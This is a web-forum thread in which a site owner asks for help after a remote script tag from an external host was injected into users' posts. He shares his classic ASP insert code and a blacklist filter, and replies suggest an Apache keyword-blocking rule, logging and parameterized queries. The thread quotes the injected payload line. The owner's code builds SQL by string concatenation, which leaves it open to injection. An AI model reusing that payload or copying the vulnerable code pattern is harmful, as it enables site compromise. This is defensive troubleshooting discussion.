Forum Moderators: phranque
I’m getting really down about all this. It's hard enough trying to start an online business. I have little experience in website security and it's obvious current security levels are not good enough. Are there any security experts out there who would be kind enough to look at my code below and give me an idea of where I am going wrong. Thanks.
Firstly here is the injection that was written to my MS SQL database:
<script src=http://www.example.ru/ads.js></script>
It is NOT embedded in links BUT instead appears at the end of messages posted by my users. It has been added to messages that already existed in the database. It has not infected every database table though.
Below is the security that is applied to all input areas of my website:
conn.Execute "insert into tbl ([groupnewsid], [thecomment], [submittedby], [groupid], [dateofcomment]) " _
& "values ('" _
& clng(request.querystring("nid")) & _
"','" & Server.HTMLEncode(cleanuptext(request.form("txtnewscomment"))) & _
"','" & clng(session("userid")) & _
"','" & clng(session("groupid")) & _
"','" & FormatMediumDate(date()) & "')"
session("errmessage2") = ""
session("varcomment") = ""
end if
And below is the cleanuptext function:
'validation allows only good characters and disallows bad strings
function cleanuptext(input)
    dim newstr, good_chars, i, c
    newstr = ""
    'protect line breaks from the character filter below
    input = replace(input,vbcrlf,"CCCCCCC")
    good_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789""`!£$%&*()_-+=:;@'#<>,.?/ "
    'keep only characters from the allow list (InStr compares case-sensitively)
    for i = 1 to len(input)
        c = mid(input, i, 1)
        if InStr(good_chars, c) > 0 then
            newstr = newstr & c
        end if
    next
    'single quotes become backticks; the rest rewrites SQL keywords and tags
    newstr = replace(newstr,"'","`")
    newstr = replace(newstr,"--","")
    newstr = replace(newstr,"XP_","")
    newstr = replace(newstr,"xp_","")
    newstr = replace(newstr,";","semicolon")
    newstr = replace(newstr,"*","asterisk")
    newstr = replace(newstr,"=","equals")
    newstr = replace(newstr,"%","percentage")
    newstr = replace(newstr,"script","scr1pt")
    newstr = replace(newstr,"Script","Scr1pt")
    newstr = replace(newstr,"SCRIPT","SCR1PT")
    newstr = replace(newstr,"union","un10n")
    newstr = replace(newstr,"Union","Un10n")
    newstr = replace(newstr,"UNION","UN10N")
    newstr = replace(newstr,"insert","1ns3rt")
    newstr = replace(newstr,"Insert","Ins3rt")
    newstr = replace(newstr,"INSERT","1NS3RT")
    newstr = replace(newstr,"drop","dr0p")
    newstr = replace(newstr,"Drop","Dr0p")
    newstr = replace(newstr,"DROP","DR0P")
    newstr = replace(newstr,"delete","d3l3t3")
    newstr = replace(newstr,"Delete","D3l3t3")
    newstr = replace(newstr,"DELETE","D3L3T3")
    newstr = replace(newstr,"create","cr34t3")
    newstr = replace(newstr,"Create","Cr34t3")
    newstr = replace(newstr,"CREATE","CR34T3")
    newstr = replace(newstr,"select","s3l3ct")
    newstr = replace(newstr,"Select","S3l3ct")
    newstr = replace(newstr,"SELECT","S3L3CT")
    newstr = replace(newstr,"exec","3x3c")
    newstr = replace(newstr,"Exec","Ex3c")
    newstr = replace(newstr,"EXEC","3X3C")
    newstr = replace(newstr,"cast","c4st")
    newstr = replace(newstr,"Cast","C4st")
    newstr = replace(newstr,"CAST","C4ST")
    newstr = replace(newstr,"varchar","v4rch4r")
    newstr = replace(newstr,"Varchar","V4rch4r")
    newstr = replace(newstr,"VARCHAR","V4RCH4R")
    newstr = replace(newstr,"declare","d3cl4r3")
    newstr = replace(newstr,"Declare","D3cl4r3")
    newstr = replace(newstr,"DECLARE","D3CL4R3")
    newstr = replace(newstr,"object","obj3ct")
    newstr = replace(newstr,"Object","Obj3ct")
    newstr = replace(newstr,"OBJECT","OBJ3CT")
    newstr = replace(newstr,"embed","emb3d")
    newstr = replace(newstr,"Embed","Emb3d")
    newstr = replace(newstr,"EMBED","EMB3D")
    'restore the line breaks
    newstr = replace(newstr,"CCCCCCC", vbcrlf)
    cleanuptext = newstr
end function
Please help me. I would be really grateful if you could show me what’s missing or what’s wrong with my existing code.
thanks
[edited by: bill at 11:27 am (utc) on Oct. 13, 2009]
[edit reason] No links please, especially one from a hacked script [/edit]
I put the following in my apache server configuration to thwart sql injection:
# Some logic to thwart SQL Injection
RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F,L]
Doing it at the server level saves having to worry about it in your code.
Just a reminder that looking for SQL commands in a query needs particular care.
I know a garden and home products site (with a newsletter) that won't accept searches for "snowdrop", "Spring update" etc. It dumps you back at the home page. Took me a while to work out what was happening. It would look completely random to your average customer.
Yeah that's the problem with my site. It's a social networking site so there's no way I can remove words like drop and update. I needed to find a better way of doing it.
Would you say my code above is adequate or is anything missing?
I'm not familiar with MS applications, more of a PHP/MySQL type, nor an expert in security, but I can offer you some thoughts:
- In SQL, you can put pretty much anything you want inside a string as long as you escape special characters like single-quote, double-quote, new-line, carriage return, null byte.
- Also make sure numeric values inside your SQL statements are actually numeric values, i.e. someone is not calling your script with id=1; select * ... and you're using that value directly in your SQL.
- If at all possible, make sure you're executing all SQL statements through your own function, then add a logging statement to that function so you can save the text of all SQL statements to a log file. That might help you figure out how the database is being hacked.
- It's possible that it's not your current script at all. Maybe the hacker added a trigger into your database during the first break-in, and that trigger is appending their code to all new comments.
- It's also possible the hacker has installed their own script on your server that runs periodically and changes the database, or maybe they can access your DB remotely. Try to change the password to fix the latter.
- To detect either of the above, try to add a new comment manually and see if the link is added to that as well.
Hope this helps.
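Pulling the first post's insert and the suggestions in the reply above together, as an added example (not code from anyone in this thread): one function runs every statement with the values bound as ADO parameters, so a quote inside a comment can never change the statement, and appends the SQL text and values to a log file; the same function is then used for the trigger check suggested above. Assumes `conn` is an open ADODB.Connection, that the id columns are int and dateofcomment is datetime, SQL Server 2005 or later for sys.triggers, and a placeholder log path the web server account can write to.

```vbscript
' Added example, not code from this thread. Assumes conn is an open
' ADODB.Connection and that LOG_PATH is a placeholder you change.
Const adCmdText = 1, adParamInput = 1
Const adInteger = 3, adVarChar = 200, adDate = 7
Const LOG_PATH = "C:\PLACEHOLDER\sql.log"
' Runs one statement with bound parameters and appends its text and values
' to the log. params: Array(adoType, value) per ? in sqlText; 4000 is the varchar size.
Function ExecParamSql(conn, sqlText, params)
    Dim cmd, i, logLine, fso, f
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = sqlText
    logLine = Now() & vbTab & sqlText
    For i = 0 To UBound(params)
        cmd.Parameters.Append cmd.CreateParameter("p" & i, params(i)(0), adParamInput, 4000, params(i)(1))
        logLine = logLine & vbTab & params(i)(1)
    Next
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(LOG_PATH, 8, True)   ' 8 = ForAppending
    f.WriteLine logLine
    f.Close
    Set ExecParamSql = cmd.Execute
End Function

' 1. The comment insert: nid must be a number before it is used at all,
'    and the comment text is bound, so quotes cannot alter the statement.
Dim nid, rs
If Not IsNumeric(Request.QueryString("nid")) Then
    Response.Status = "400 Bad Request"
    Response.End
End If
nid = CLng(Request.QueryString("nid"))
ExecParamSql conn, _
    "insert into tbl ([groupnewsid],[thecomment],[submittedby],[groupid],[dateofcomment]) values (?,?,?,?,?)", _
    Array(Array(adInteger, nid), _
          Array(adVarChar, Server.HTMLEncode(Request.Form("txtnewscomment"))), _
          Array(adInteger, CLng(Session("userid"))), _
          Array(adInteger, CLng(Session("groupid"))), _
          Array(adDate, Date()))
' 2. Trigger check from the reply above: list triggers on the comments
'    table (sys.triggers needs SQL Server 2005 or later; assumption).
Set rs = ExecParamSql(conn, _
    "select name, is_disabled from sys.triggers where parent_id = OBJECT_ID(?)", _
    Array(Array(adVarChar, "tbl")))
Do Until rs.EOF
    Response.Write Server.HTMLEncode(rs("name") & " disabled=" & rs("is_disabled")) & "<br>"
    rs.MoveNext
Loop
```

Adding a test comment through the page and then reading the log shows exactly which statement touched the row; if the script tag still appears on a row no logged statement wrote it, the cause is outside this page (trigger, job or direct database access).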
I'm not familiar with MS applications, more of a PHP/MySQL type, nor an expert in security, but I can offer you some thoughts:
- In SQL, you can put pretty much anything you want inside a string as long as you escape special characters like single-quote, double-quote, new-line, carriage return, null byte.
I believe I have already done this. Could somebody clarify by checking my cleanup script above?
- Also make sure numeric values inside your SQL statements are actually numeric values, i.e. someone is not calling your script with id=1; select * ... and you're using that value directly in your SQL.
Probably a dumb question but how and where do I check that numeric values are numeric values?
thanks for all this :)